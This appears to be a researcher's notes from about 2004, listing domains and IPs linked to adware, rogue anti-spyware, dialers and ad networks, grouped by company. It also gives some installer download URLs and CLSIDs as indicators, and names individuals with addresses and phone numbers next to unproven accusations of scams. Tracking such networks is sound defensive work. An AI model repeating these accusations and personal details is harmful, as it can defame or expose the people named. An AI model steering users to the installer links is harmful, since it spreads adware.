66.230.211.90  freebikiniwallpaper.com (france)

207.234.129.147  hoteroticwallpapers.com
abshostingsyltoniya, 88 tashkent 700142 uzbekistan
static.windupdates.com/cab/cdtinc/ie/bridge-c18.cab
**
63.99.108.159  validsearch.com
66.28.56.112   annakova.com -download.overpro.com/wildapp.cab
66.98.142.20   skimpythongs.com
66.230.211.90  desktop-dancers.com
play2enter.com (surf control)

wallpapernudes.com/
69.20.121.35  grocerycouponsdirect.com bizdev @ consumercreditusa.com/
69.20.121.35  freecameranow.com

69.20.121.35  consumercreditusa.com
69.20.121.35  giftcardsdirect.com
69.20.121.35  yourfreepearls.com
consumercreditusa
208 e 51st st #378
new york, ny 10022
lisa rhodes

322 e 50th st
new york, ny 10022
joe levine
**********
iwon, inc./focus interactive
iwon.com:208.45.133.25 
208.45.133.132 imgfarm.com:
208.45.133.132 i1img.com
208.45.133.133 myway.com
eula
info.myway.com/terms/mw_speedbar.html
208.45.133.133 mywaysearch.com
63.111.71.203 ak.imgfarm.com:
208.45.133.104 blastdirect.com

63.236.75.87 artisticsmiley.com
63.236.75.87 artistssmiley.com
63.236.75.87 board-smiley.com
63.236.75.87 boardsmiley.com
63.236.75.87 boardsmileys.com
63.236.75.87 centersmiley.com
63.236.75.87 chat-smiley.com
63.236.75.87 chat-smileys.com
63.236.75.87 classicsmiley.com
63.236.75.87 comicsmileys.com
63.236.75.87 creativesmiley.com
63.236.75.87 cursormania.com
63.236.75.87 directsmiley.com
63.236.75.87 easysmiley.com
63.236.75.87 email-smileys.com
63.236.75.87 funwebproducts.com
63.236.75.87 greatsmiley.com
63.236.75.87 happiest-faces.com
63.236.75.87 historyswatter.com
63.236.75.87 iluvsmileys.com
63.236.75.87 ismileys.com
63.236.75.87 mycomputersearch.com
63.236.75.87 myfastinternetcom
63.236.75.87 myformfiller.com
63.236.75.87 mymailnotifier.com
63.236.75.87 mymailsignature.com
63.236.75.87 mymailstamp.com
63.236.75.87 mymailstationary.com
63.236.75.87 mymailstationery.com
63.236.75.87 mysafesurfer.com
63.236.75.87 myspamswatter.com
63.236.75.87 mywalletpal.com
63.236.75.87 netsmileys.com
63.236.75.87 pcsmileys.com
63.236.75.87 popswat.com
63.236.75.87 popswatter.com
63.236.75.87 popularscreensaver.com
63.236.75.87 popularscreensavers.com
63.236.75.87 realsmiley.com
63.236.75.87 smiley-4you.com
63.236.75.87 smileyartists.com
63.236.75.87 smileycentral.com
63.236.75.87 smileycentral.org
63.236.75.87 smileycentralsucks.com
63.236.75.87 smileyconnect.com
63.236.75.87 smileydirect.com
63.236.75.87 smileydirectory.com
63.236.75.87 smileyforyou.com
63.236.75.87 smileyglobal.com
63.236.75.87 smileyhit.com
63.236.75.87 smileykey.com
63.236.75.87 smileylink.com
63.236.75.87 smileys-4you.com
63.236.75.87 smileys-central.com
63.236.75.87 smileys-links.com
63.236.75.87 smileys-market.com
63.236.75.87 smileys-world.com
63.236.75.87 smileys4you.com
63.236.75.87 smileysallstars.com
63.236.75.87 smileysbusiness.com
63.236.75.87 smileyscafe.com
63.236.75.87 smileyscustomheaders.com
63.236.75.87 smileysdomain.com
63.236.75.87 smileyservers.com
63.236.75.87 smileysfinest.com
63.236.75.87 smileyshields.com
63.236.75.87 smileyshouse.com
63.236.75.87 smileysinamerica.com
63.236.75.87 smileysnetcom
63.236.75.87 smileysoutlet.com
63.236.75.87 smileyspeople.com
63.236.75.87 smileyspicks.com
63.236.75.87 smileysplaces.com
63.236.75.87 smileysscooters.com
63.236.75.87 smileyssite.com
63.236.75.87 smileyssounds.com
63.236.75.87 smileyssuck.com
63.236.75.87 smileystart.com
63.236.75.87 smileystock.com
63.236.75.87 smileystudios.com
63.236.75.87 smileystuff.com
63.236.75.87 smileysucks.com
63.236.75.87 smileysurvey.com
63.236.75.87 smileysweb.com
63.236.75.87 smileysworld.com
63.236.75.87 spin4dough.com
63.236.75.87 thesmileyshop.com

eula:
by.optimost.com/click.php/24,5072,408,381,4889,oh.8f.2oh/
all of our applications come with the my way speedbar™ or my web search™
browser plugin 

********************** 
scam security cloneware 
(spywarenuker and noadware.com see trekdata gang above)

webhelper4u.com/clones/noadware.html
(screen shots and profile of the author of the softwares)

noadware.net:69.20.71.82 bilal ahmed
noadware.us:64.202.167.129 bilal ahmed
no-adware.net:64.202.167.129 bilal ahmed (redirects to noadware.net)
spywarekilla.com 207.44.208.34 bilal ahmed
spyware-cop.com:207.44.208.34 bilal ahmed

scanspyware.net:12.30.241.242
pc security center
bilal ahmed
9th street apl 15l
brooklyn, new york 11215 us
+1.7187682154
102519@whois.gkg.net

*****************
palso.com:64.15.205.202
aksoftware.com (lists spywarenuker and noadware affiliates)

eblocs.com:64.225.154.39 (scare ads)

*****************
clickspring, llc
purityscan.com:66.150.193.102 (pornography scan)
clickspring.net:66.150.193.103
puritysweep.com:66.150.193.102

*****************
suspected scams
****************
adwarehunter.com:69.59.169.157
nepalnews.com:66.132.242.192
browser-page.com:66.98.208.55
ssppyy.com:205.179.128.98
***************************
innovative marketing, inc.
1876 hutson street
belize city, na 
bz

208.48.15.13 - ip hosts 79 total domains
internet antispy
208.48.15.13 4hotstocks.com
208.48.15.13 bankcashadvance.com
208.48.15.13 besisk.com
208.48.15.13 bestcashloans.com
208.48.15.13 billingcomplete.com
208.48.15.13 billingticket.com
208.48.15.13 broadcastinginstitute.com
208.48.15.13 broadcastingwork.com
208.48.15.13 buysmarter.com
208.48.15.13 cashguides.com
208.48.15.13 computeranywhere.com
208.48.15.13 computercleaner.com
208.48.15.13 computershield.com
208.48.15.13 computersupercharger.com
208.48.15.13 contentreview.com
208.48.15.13 crashprotector.com
208.48.15.13 creditsecretsguide.com
208.48.15.13 discountbob.com
208.48.15.13 diskprotector.com
208.48.15.13 download-central.com
208.48.15.13 downloadcontrol.com
208.48.15.13 drivecleaner.com
208.48.15.13 drivefixer.com
208.48.15.13 driveprotector.com
208.48.15.13 dslvelocity.com
208.48.15.13 easydivorceguide.com
208.48.15.13 easywillguide.com
208.48.15.13 ebayguides.com
208.48.15.13 epinioncash.com
208.48.15.13 eztaxfiler.com
208.48.15.13 filefixer.com
208.48.15.13 fileprotector.com
208.48.15.13 getfreecar.com
208.48.15.13 holly-whores.com
208.48.15.13 hotliveamateurs.com
208.48.15.13 hotliveasians.com
208.48.15.13 hotlivegirls.com
208.48.15.13 hotlivenetwork.com
208.48.15.13 hummerhump.com
208.48.15.13 imagefixer.com
208.48.15.13 innovativeventures.net
208.48.15.13 internetantispy.com
208.48.15.13 internetblocker.com
208.48.15.13 internetspy.com
208.48.15.13 intrudertrace.com
208.48.15.13 kazaaplatinum.com
208.48.15.13 kazaaupgrade.com
208.48.15.13 kpremium.com
208.48.15.13 mensanswers.com
208.48.15.13 morpheusmp3s.com
208.48.15.13 mp3bundle.com
208.48.15.13 mp3downloadclub.com
208.48.15.13 mp3guidebook.com
208.48.15.13 multimediafixer.com
208.48.15.13 netsupercharger.com
208.48.15.13 networkprotector.com
208.48.15.13 opensols.com
208.48.15.13 pcsupercharger.com
208.48.15.13 popupavenger.com
208.48.15.13 popupguard.com
208.48.15.13 pornnap.com
208.48.15.13 privacyprotector.com
208.48.15.13 quikpicks.com
208.48.15.13 refunds-online.com
208.48.15.13 remotescout.com
208.48.15.13 removeyourself.org.
208.48.15.13 saynototaxes.com
208.48.15.13 spamblockerpro.com
208.48.15.13 spamprotector.com
208.48.15.13 speeddrive.com
208.48.15.13 stockpops.com
208.48.15.13 stopguard.com
208.48.15.13 surfpatrol.com
208.48.15.13 systemdoctor.com
208.48.15.13 velocityads.com
208.48.15.13 virusguard.com
208.48.15.13 windowsrecovery.com
208.48.15.13 workhomecenter.com
208.48.15.13 zoav.com

******************************
lop.com owner
warnet.com:63.218.224.50
**
nationalnet, inc.
66.115.136.230 spywarethis.com
66.115.136.241 achtungachtung.com
sitetracking.info/cttdl.cab
**
secure computer, llc
checkforspyware.com:204.0.126.221
popuppadlock.com:204.0.126.221
*********************************************

spycop.com:209.25.165.165
209.25.165.165 1axis.com 
209.25.165.165 cybercrimetv.com 
209.25.165.165 cyberloc.com 
209.25.165.165 datarecoveryroom.com 
209.25.165.165 evidence-terminator.com 
209.25.165.165 executivechoicejets.com 
209.25.165.165 floridaboatingvacations.com 
209.25.165.165 fundraisingforfree.com 
209.25.165.165 goldmaker.com 
209.25.165.165 hbipartners.com 
209.25.165.165 jetsetvacations.com 
209.25.165.165 lynkz.com 
13 myeuropeanbakery.com 
14 nationalcybersecurity.com 
15 nospyzone.com 
16 onlinesalestracker.com 
17 purelyprivate. 
18 skycam1.com 
19 spycop.com 
20 spycopcorporate.com 
21 spyfacts.com 
22 spyfacts. 
23 surfshieldpro.com 
24 virtualsecureoffice.com 
25 vortaxonline.com 




**********************************************
sjb enterprises, inc. 
208.255.91.41 sjbcorp.com - marketing
205.134.161.89 netshagg.com (installs 3rd party adware)
205.134.161.89 gotsailor.com
205.134.161.89 mygamecopy.com
205.134.161.89 mynetcompanion.com 
205.134.161.89 mynetprotector.com 
205.134.161.89 mynetprotector.net
205.134.161.89 mypcdownload.com
205.134.161.89 netshagg.com 
205.134.161.89 netshagg.net


*****

128.121.194.10 onlinepcfix.com (spyferret)
199.239.233.2 spyferret.com
199.239.233.2 ebizbasics.net

*************************
adware foisting companies

*************************

cpm media 
2nd-thought.com:69.28.210.140

***************

whenu.com
209.11.45.139 clock-sync.com 
209.11.45.139 findmyweather.com 
209.11.45.139 getclocksync.com 
209.11.45.139 getweathercast.com 
209.11.45.139 stetmail.com 
209.11.45.139 syncyourclock.com 
209.11.45.139 whenu.com 
209.11.45.139 whenubuild.com 
209.11.45.139 whenubuy.com 
209.11.45.139 whenuchat.com 
209.11.45.139 whenuclock.com 
209.11.45.139 whenucook.com 
209.11.45.139 whenudecorate.com 
209.11.45.139 whenuincorporate.com 
209.11.45.139 whenuinvest.com 
209.11.45.139 whenuinvest.net 
209.11.45.139 whenulearn.com 
209.11.45.139 whenumail.com 
209.11.45.139 whenurelax.com 
209.11.45.139 whenuretire.com 
209.11.45.139 whenusearch.com 
209.11.45.139 whenushop.com 
209.11.45.139 whenushop.org. 
209.11.45.139 whenusleuth.com 
209.11.45.139 whenusurf.com 
209.11.45.139 whenusurf.net 
209.11.45.139 whenutravel.com 
209.11.45.139 whenutravel.net 
209.11.45.139 whenuweathercast.com 
209.11.45.139 whenyou.com 
209.11.45.139 whenyoubuild.com 
209.11.45.139 whenyoubuy.com 
209.11.45.139 whenyoucook.com 
209.11.45.139 whenyoudecorate.com 
209.11.45.139 whenyouinvest.com 
209.11.45.139 whenyousearch.com 
209.11.45.139 whenyoushop.com 
209.11.45.139 whenyoushop.org. 
209.11.45.139 whenyousurf.com 
209.11.45.139 whenyoutravel.net 
209.11.45.139 whereuinvest.net 
216.200.68.6 spweather.whenu.com

***************

le web (webjc-dom) (astology readings)
109 rue du gl de gaulle
rambouillet 78120 fr
domain name: webjc.com

62.210.164.83 sara-freder.com
62.210.164.84 pasqualina.com
***********

ibis
146.82.109.225 ibisglobal.com 
146.82.109.225 ibisit.com 
146.82.109.225 senkypl.com 
146.82.109.225 spywareterminator.com 
146.82.109.225 trafficsyndicate.com 
146.82.109.225 websearch.net 

146.82.109.220 crawler.com (search results thru is1.websearch.com)
146.82.109.220 huntbar.com 
146.82.109.220 websearch.com 
146.82.109.220 win-tools.com 
208.185.247.157 weblizer.com
146.82.109.210 download.websearch.com

infosapce
66.150.2.83 is1.websearch.com (go2.net / infospace) 
66.150.2.71 clickit.go2net.com (links in code that is used when hijacked)
206.29.192.13 kevdb.infospace.com
206.29.192.200 infospace.com
66.150.2.101 go2net.com

hklm\software\microsoft\internet explorer\search,searchassistant 
websearch.com/ie.aspx?tb_id=40


************
180solutions

216.74.27.20 180searchassistant.com 
216.74.27.20 180solutions.com 
216.74.27.20 metricsdirect.com 
216.74.27.20 n-case.com 
216.74.27.20 n-case.net 
216.74.27.20 zango.com 
216.74.27.20 zangomessenger.com 
216.74.27.20 zangoshowtimes.com 
216.74.57.13 captioncity.com
216.74.27.27 ax.180solutions.com
216.74.27.29 installs.180solutions.com
*************************
visicom media inc. 
69.50.134.71 visicommedia.com
69.50.138.195 visic.com 
69.50.138.195 visicommedia.com 
69.50.138.195 vmn.net 


*************************

dirtyduckets
clicktracking.info:66.55.162.59


*********
peopleonpage, inc
kent ertugrul
26, avenue kleber
paris, 75006 fr
207.44.142.4 peopleonpage.com
207.44.142.4 lucasdylan.com
66.98.188.54 download.peopleonpage.com

************

66.194.37.34 7adpower.com (porn dialers)
66.194.37.33 visprof.com
************
68.168.78.26 adelphia.net:
216.127.80.113 adtomi.com

*********
209.132.205.222 mediacharger.com
209.132.205.222 swimsnet.com 
209.132.205.222 swimsuitnetwork.com 
209.132.205.222 download.mediacharger.com
swimsuitnetwork.cab (activeinstall.dll)

*****************

foxxweb interactive inc.(softomate 000)

66.28.204.246 alwaysfreebabes.com
66.28.204.246 dailystarpics.com
66.28.204.246 findapenpaltoday.com
66.28.204.246 fizzlewizzle.com
66.28.204.246 foxxweb.com
66.28.204.246 freewebtrials.com
66.28.204.246 homepageprotector.com
66.28.204.246 millerga.com
66.28.204.246 mindfake.com 
66.28.204.246 thenamesite.com


************
ad scams
************
clicknvote.com (owned by known spammer)
69.59.175.148 clicknvote.com
69.59.175.148 guiltyorfree.com
64.202.163.162 vote2004today.com

208.48.182.40 theuseful.com (p.o. box 20354 greenville, nc 27858)
208.48.182.44 claimyourcamera.com
208.48.182.44 dbestdeals.net
208.48.182.44 eatoutfreetoday.com
208.48.182.44 eatoutonus.com
208.48.182.44 electronicspresent.com
208.48.182.44 expertsavings.com
208.48.182.44 expsavings.com
208.48.182.44 freecameraonus.com
208.48.182.44 freecameraprovider.com
208.48.182.44 freecamerasource.com
208.48.182.44 freedinnerpass.com
208.48.182.44 freedinnersource.com
208.48.182.44 freedvddept.com
208.48.182.44 freedvdtoday.com
208.48.182.44 freeelectronicscenter.com
208.48.182.44 freeelectronicsdepot.com
208.48.182.44 freeelectronicsonus.com
208.48.182.44 freeelectronicssource.com
208.48.182.44 freeentertainmentsource.com
208.48.182.44 freeentertainmenttoday.com
208.48.182.44 freefoodprovider.com
208.48.182.44 freefoodsource.com
208.48.182.44 freefuelcard.com
208.48.182.44 freefuelcoupon.com
208.48.182.44 freegamessource.com
208.48.182.44 freegasonus.com
208.48.182.44 freegasprovider.com
208.48.182.44 freegassource.com
208.48.182.44 freegiftcardprovider.com
208.48.182.44 freegiftcardsource.com
208.48.182.44 freegiftprovider.com
208.48.182.44 freegiftreward.com
208.48.182.44 freegiftsource.com
208.48.182.44 freemp3playerprovider.com
208.48.182.44 freemp3playersource.com
208.48.182.44 freemusictoday.com
208.48.182.44 freepodsource.com
208.48.182.44 freepresentdepot.com
208.48.182.44 freerestaurantprovider.com
208.48.182.44 freerestaurantsource.com
208.48.182.44 freeshoppingprovider.com
208.48.182.44 freeshoppingsource.com
208.48.182.44 getafreedinner.com
208.48.182.44 getyourfreedvds.com
208.48.182.44 giftcardpresent.com
208.48.182.44 giftelectronics.com
208.48.182.44 great-offers.net
208.48.182.44 greatwebmaster.com
208.48.182.44 hipsavings.com
208.48.182.44 homeimprovementonus.com
208.48.182.44 mp3playerprovider.com
208.48.182.44 mp3playersource.com
208.48.182.44 myfreedinner.com
208.48.182.44 myfreemp3player.com
208.48.182.44 mymp3playersource.com
208.48.182.44 mypodprovider.com
208.48.182.44 specialgiftcards.com
208.48.182.44 specialgiftreward.com
208.48.182.44 specialgiftrewards.com
208.48.182.44 supersweepscenter.com
208.48.182.44 surveyrewards.com
208.48.182.44 sweepscenter.com
208.48.182.44 theuseful-16.com
208.48.182.44 theuseful-19.com
208.48.182.44 veryspecialthings.net
208.48.182.44 yourdvdplayer.com
208.48.182.44 yourfreedinner.com
208.48.182.44 yourfreegascard.com
208.48.182.44 yourfreegascards.com
208.48.182.44 yourfreemoviepass.com
208.48.182.44 yourfreemp3player.com
208.48.182.44 yourfreemusiccds.com
208.48.182.44 yourfreepencam.com
208.48.182.44 yourgascard.com
208.48.182.44 yourgascards.com
208.48.182.44 yourmp3player.com

****************

123 click, inc./web clients inc.(works with offeroptimizer.com)
65.105.124.60 websponsors.com
65.105.124.49 g.websponsors.com
65.105.124.50 a.websponsors.com
65.105.124.32 webclients.net
65.105.124.141 trial-offers.com
65.105.124.113 free2try.com
64.21.117.158 i-dealdirect.com
192.216.159.47 moviesonus.com
192.216.159.48 giftcardsonus.com
192.216.159.49 learningquest.org (search4clicks.com:12.158.137.108 affiliate)and interfaces with websponsors.com
192.216.159.50 iraqismostwanted.net (i-dealdirect.com) free playing cards
192.216.159.53 secure.i-dealdirect.com
192.216.159.54 30daycoralcalcium.com (https) 
gph worldwide, inc.  po box 1353    camp hill, pennsylvania 17001
i-dealdirect dns
(these statements have not been evaluated by the food and drug administration. this product is not intended to diagnose, treat, cure or prevent any disease. )
192.216.159.55 freehornygoatweed.com (re-directs to secure.i-dealdirect.com)**
192.216.159.59 restaurantsonus.com 
192.216.159.62 ohmypod.com
192.216.159.62 freemoviemayhem.com
192.216.159.62 2daygetaways.com 
192.216.159.62 2for1airfare.com 
192.216.159.62 airfare4free.com 
192.216.159.62 cleanpc4free.com 
192.216.159.62 digitalcamera4free.com 
192.216.159.62 directscholar.com 
192.216.159.62 freegreenxbox.com 
192.216.159.62 freeminidv.com 
192.216.159.62 freemoviemayhem.com 
192.216.159.62 freenightonthetown.com 
192.216.159.62 freetoysforyou.com 
192.216.159.62 getthegamefree.com 
192.216.159.62 guardyourpc.com 
192.216.159.62 higherlearningnetwork.com 
192.216.159.62 ohmypod.com 
192.216.159.62 shoppingcritics.com 
192.216.159.62 twisterstuntcar.com 
192.216.159.62 voicenetplus.com 
192.216.159.63 allthefunthatsfittoprint.com 
192.216.159.63 bargainbetsy.com 
192.216.159.63 buildmyassets.com 
192.216.159.63 consumerhorizon.com 
192.216.159.63 ehealth-click.net 
192.216.159.63 entertainmentclick.com 
192.216.159.63 everythingforthehomenews.com 
192.216.159.63 financenewscenter.com 
192.216.159.63 financeonlinenews.com 
192.216.159.63 financial-cents.net 
192.216.159.63 freestuff4me.com 
192.216.159.63 goodtimes-usa.com 
192.216.159.63 hotdealdispatch.com 
192.216.159.63 i-learning247.com 
192.216.159.63 jumpinjackdeals.com 
192.216.159.63 killercareer.com 
192.216.159.63 myfreeportal.com 
192.216.159.63 onlinescholarsnews.com 
192.216.159.63 savingsgazette.com 
192.216.159.63 savingsnexus.com 
192.216.159.63 sharehealthinfo.com 
192.216.159.63 starhomebusiness.com 
192.216.159.63 thelearningclick.com 
192.216.159.63 valuedispatch.com 
192.216.159.63 valueobserver.com 
192.216.159.63 webhomenews.com 
192.216.159.63 wellness-101.com 
192.216.159.63 welnessweeklyreport.com 
192.216.159.63 workathomeenews.com 
192.216.159.63 yourwellnesscenter.com 
192.216.159.64  brandnameoffers.com
192.216.159.70  gethomejobs.com
192.216.159.132  click-123.com
192.216.159.159  remodel4free.com
192.216.159.159  50dollargiftcard.com
192.216.159.15925  dollargiftcard.com 
192.216.159.159  americanbeautysweepstakes.com 
192.216.159.159  bonappetitusa.com 
192.216.159.159  cleansweep4free.com 
192.216.159.159  dineoutfreetoday.com 
192.216.159.159  electronicsonus.com 
192.216.159.159  free-bracelet.com 
192.216.159.159  freerazorzone.com 
192.216.159.159  h2sweepstakes.com 
192.216.159.159  hugecashgiveaway.com 
192.216.159.159  ilovefreefood.com 
192.216.159.159  lingerie4free.com 
192.216.159.159  mustangsweeps.com 
192.216.159.159  remodel4free.com 
192.216.159.159  saveatthepump.com 
192.216.159.159  thefreegrill.com 
192.216.159.159  truckgiveaways.com 
192.216.159.159  xtremerenovation.com 
192.216.159.160  consumer-alert.net
192.216.159.100  coffeemaker4free.com
192.216.159.100  freeflicktix.com
192.216.159.100  freetiffanybracelet.com
192.216.159.100  getafreemixer.com 
192.216.159.100  getfreegas2go.com 
192.216.159.100  simplyfreegiftcards.com 
192.216.159.68  bullseye-media.net
192.216.159.96  redtagoffers.com

***********
review to add 8182004
64.56.194.87  travelzoo.com
**
netflip
netflip.com 66.110.189.30
metareward.com 66.110.189.27
topfreegifts.com 66.110.189.27
movieticketsource.com 66.110.189.27
misterpoints.com 66.110.189.27
expertsoncredit.com 66.110.189.27

freegiftcenter.com 207.155.252.18 (part of thanksmuch.com - traffix)

**************
subscriberbase
sbase30.com 216.109.87.250
subscriberbase.com 216.109.87.253
weeklysurveys.com 216.109.87.252
addrive.com 216.109.86.125

**************
consumercreditusa 
consumercreditusa.com 69.20.92.81

**************
ad servers
*************
rightmedia.net:209.73.203.226
right media, llc
276 5th ave. ste. 401
new york, ny 10001 us
**
round up 4 network, inc
poindextersystems.com:129.33.228.192
ru4.com:129.33.228.192
http300.edge.ru4.com:64.191.208.206


**
64.209.232.100  ctxtads.overture.com
63.163.102.248  overture.com(yahoo inc.)
66.201.203.154  targetnet.com (mamma.com)
209.73.203.226 rightmedia.net
66.98.208.60   paypopup.com
66.77.72.8     mammamediasolutions.com 
66.77.72.8     clients.mamma.com 
161.58.216.234 digitalarrow.com 
209.190.215.60 ad-tech.com 
63.236.25.115  focusin.ads.targetnet.com
66.201.203.151 focusin.com 
**
208.45.133.161 c4.maxserving.com
208.45.133.161 maxserving.com 
208.45.133.236 maxonline.com 
**
clickxchange corporation
clickxchange.com:216.23.185.99
**
valueclick
clickagents.com:64.70.54.41 (works also thru offeroptimizer)
ads.clickagents.com:64.70.54.44
valueclick.com:64.70.54
mediaplex.com:64.70.54.41

**
zedo, inc.
zedo.com:64.41.197.38
xads.zedo.com:64.41.197.40
c1.zedo.com:209.249.123.45

**
specificpop.com:69.94.14.95
vanderhook, chrisspecificpop.com:69.94.14.95
advertisementbanners.com:66.70.150.116
ads.specificpop.com:216.120.60.144

**
aquantive inc.
atdmt.com:216.74.132.24
avenuea.com:216.34.88.111

****
extreme digital nl
extreme-dm.com:213.244.183.201

*******************
peel.com:64.200.214.178 (possibly involved with wmplayer.exe chm exploits)

*******************
buds, inc
budsinc.com:64.62.232.4 
*******************
sbc investments pty ltd
e-bannerx.com 207.44.240.113
*******************
fastclick
fastclick.com:205.180.85.15
adserver.com:205.180.85.15
z1.adserver.com:205.180.85.126
fastclick.comedgesuite.net:63.111.71.206
edgesuite.net has no ip but belongs to akamai technologies

************

softwareonline.com
sharewareonline.com:66.216.126.170
sharewareonline.com:66.216.126.170
adserver.sharewareonline.com:65.61.157.153

************
dealhelper/xupiter

63.146.114.40 ads.dealhelper.com 
63.146.114.41 dealhelper.com 
63.146.114.41 timesynchronize.com 
63.146.114.41 searchspotter.com (re-directs to abcsearch.com)
63.146.114.42 abcsearch.com 
63.236.52.20 xupiter.com 
63.236.52.23 weather7.com 
63.236.52.23 sponsor1.com 
63.236.52.24 orbitexplorer.com 

63.236.32.22 cashclicks.com 
63.236.32.22 sexhungry.com 
63.236.32.22 ranchpussy.com 
nudelink.com:63.236.32.22
triple-input.com 63.236.32.22
abcsearch.com 63.236.32.33 
searchwho.com 63.236.32.56 

browserwise.com 216.133.239.178
browserwise.com 216.133.239.179
sqwire.com 216.133.239.179
sqwire.com 216.133.239.180
sqwire.com 216.133.239.182

sqwire.i-lookup.com 216.130.188.217 
i-lookup.com 216.130.188.210
john zuccarini sites
amaturevideos.nl 64.40.102.44 (xupiter would re-direct to this porn site)
yes-yes-yes.com: (john zuccarini no ip)
webfile.com:64.40.102.48
xupter.com opened to the normal xupiter search page
globalsystemsconsulting.com 209.133.117.130
totalmanaged.com 209.133.117.130

connection with xupter/dealhelper
proto web co hk
proto.com:64.40.102.48
spyware.net:64.40.102.41
webfile.com:64.40.102.48 
bulkurl.com:64.40.102.48
toolbar.webfile.com:64.40.102.48 (visicom media toolbar)
amaturevideos.nl 64.40.102.44
yes-yes-yes.com 64.40.102.44

**************
adware installers
**************
66.230.140.202 prowrestling.com multiple popups
198.87.84.229  voiceofwrestling.com 
**

209.132.232.12 mydailyhoroscope.net
eula: mydailyhoroscope.net/mdh/terms.aspx#privacy
**
204.251.10.217 n-lite.com installs a new variant of favoriteman
clsid = s '{ebbd88e5-c372-469d-b4c5-1fe00352ab9b}
installs from : 64.201.100.232 ouchvideo.com
64.201.103.56  mmviewer.com
64.201.100.232 dailywinner.net 
installs svcmm32.exe clsid: e66a5764-212b-40ec-8fb8-16949f6a82cd

64.201.100.232  exitboost.com
64.201.100.232  greatprizescentral.com
64.201.100.232  o-utside.com
64.201.100.232 ouchvideo.com
*******
indiatarget.com:216.127.68.26
uses targetnet.com:66.201.203.154(moma.com)

**
adintelligence llc
adintelligence.net:207.44.142.234
adintelligence.net/license.html

*********

2nd-thought.com:69.28.210.150 (installs popi, asintellegience, betterinternet)
2nd-thought.com/terms.html

********
msgplus.net:66.220.17.175
msgpluszone.com:66.98.252.17
(installs c2media lop.com, adi. also is a partner of lop.com)

casale media
casalemedia.com:66.199.141.53 (email and zip transmitted to casalemdia.com)
as.casalemedia.com:66.199.131.68
asg03.casalemedia.com:66.199.131.73

***********

whistle software inc (to install, collects email and zipcode)
wsel.net:69.0.176.23
whistlesoftware.com:69.0.176.24
uslocalweather.com:69.0.176.24

***********
virtual ad systems
vru4.com:64.186.152.254

gigaisp, inc
imagesrvr.com:64.186.152.191
locator.imagesrvr.com:64.186.152.82
gigaisp.net:64.186.152.113

*****************
cjb management, inc.
cjbmanagement.com:216.194.70.2
mircx.com:216.194.70.2
cityfreq.com:216.194.70.3
cjb.net:216.194.70.4
searchcom:216.194.70.7 uses: (ezanga.com:206.161.125.10 interface)

media 3 technologies, llc
209.211.255.194/cjb.htm
code calls:
revenue.net:64.235.246.62
popupsponsor.com:64.235.246.121
oversee.net:64.235.246.26

***
thepowerstrip.com:206.252.137.79
adsvr.net:66.48.41.70
adsvr.net/powerstrip/psocx.cab
thepowerstrip.com/terms/
contextual advertising

***
aws convergence technologies, inc

weatherbug.com:128.121.26.135
aws.com:128.121.26.143
download.weatherbug.com:213.35.101.19
ww3.weatherbug.com/aws/default.asp?rnd=33442&cid=53

***
x10 wireless technology, inc.
x10.com:63.211.210.22
***
creative skyhorn productions
aaa1screensavers.com/eula.html (eula 99 plus pages)
(foists sahagent, bookedspace,commonnames,ezula,sqwire,adintelligence, peopleonpage 
pop!
total velocity inc., whistlesoftware)
skyhorn.com:66.194.163.74
aaa1screensavers.com:66.194.163.74
downloads.aaa1screensavers.com:198.5.148.13

classid="clsid:9dbafccf-592f-ffff-ffff-00608cec297b"
downloads.aaa1screensavers.com/download/screload-mamma.exe
**
belcaro group, inc
shopathomeselect.com:199.221.131.110
**
bookedspace.com, inc./server central network
(aka virtumundo)
bookedspace.com:66.225.196.202
bxxs5.dll
**
commonnametm (very vague with no url)
**
searchforit is supported by the ezula advertising and revenue network (earn). 
**
sqwire enterprises inc.
sqwire.com:216.133.239.179

**


ezula inc. /ezula/kabanga
ezulaadvertisingrevenuenetwork.com:208.185.211.71
ezula.com:208.185.211.71

servercentral.net:64.202.97.102
**
total velocity inc
totalvelocity.com:66.159.219.201

***

hotbar.com inc / oberon media inc.
165.254.12.99	secure.hotbar.com
165.254.12.100	e-zaza.com
165.254.12.100	emoticons4us.com
165.254.12.100	estationary.com
165.254.12.100	estationery.com
165.254.12.100	fastutilities.com
165.254.12.100	hotbar-inc.com
165.254.12.100	htobar.com
165.254.12.100	pc-polish.com
165.254.12.100	pcpolish.com
165.254.12.100	shopperreports.com
165.254.12.100	software4thenet.com
165.254.12.100	spamblockerutility.com
165.254.12.100	spamfree.com
165.254.12.100	wowpapers.com
165.254.12.101	license.hotbar.com
165.254.12.101	dynamic.hotbar.com
165.254.12.101	tooltips.hotbar.com
165.254.12.102	installs.hotbar.com
165.254.12.102	partners.hotbar.com
165.254.12.102	ads.hotbar.com
165.254.12.202	reports.hotbar.com
165.254.12.104	datez.com
165.254.12.104	dateznews.com
165.254.12.104	fofom.com
165.254.12.104	matchoogle.com
165.254.12.104	matchooglenews.com
165.254.12.105	page-not-found.net
165.254.12.105	resultsmaster.com
165.254.12.105	cs.hotbar.com
165.254.12.131	adopt.hotbar.com
165.254.12.202	reports.hotbar.com
165.254.12.202	net-offers.net
165.254.12.203	updates.hotbar.com



oberon-media.com:209.208.162.18
installs.hotbar.com:165.254.12.102

***********
tickle, inc.
tickle.com:129.250.134.126
connect.tickle.com/toolbar/index.html
connect.tickle.com:129.250.134.111
web.tickle.com:129.250.134.115
i.emode.com:63.111.30.114
emode.com:129.250.134.126 

***********
media-motor.com:207.44.196.98
roings.com:67.15.14.35
logs.roings.com:67.15.14.35
67.15.18.46 popuppers.com
67.15.14.35 bins2.media-motor.net/
67.15.14.35 roings.com

66.98.252.43 tar.popuppers.com
69.57.128.54 mmm.roings.com/install.php code calls 
mmm.media-motor.net/soft and has a file:default.exe
code in default.exe maxmind.com
207.44.162.51  maxmind.com
maxmind llc
po box 230074
boston, ma 02123
mather, tj  tjmather @ maxmind.com
617.670.1590
815.301.8737

logs.media-motor.net/log3.php
***********

mediatickets/clickspring, llc
suspected part of purityscan (see purityscan above)
mt-download.com:66.150.193.112
mediatickets.net:66.150.193.126

mt-download.com/terms.html
uninstalling the software. in order to uninstall the software, you will need to run 
the 
removal executable. you can get this program by contacting support@mediaticket.net 
clsid={9eb320ce-be1d-4304-a081-4b4665414bef}
mediaticketsinstaller.ocx

***************************************************
suspected exploit and multiple adware install sites
cyberturf.com/freepictures/hilton/paris.html
***************************************************
66.17.245.117  alwaysgirls.ezthemes.com
actressmodels.com:69.56.221.186 (lie teng)
godesktop.com:69.56.221.186
alwaysgirls.net:69.56.221.186 (affiliate of trekdata - 
nuker.com/info/01.php?hop=budpopjune&pg=1&sku=2004)
godesktop.com:69.56.221.190
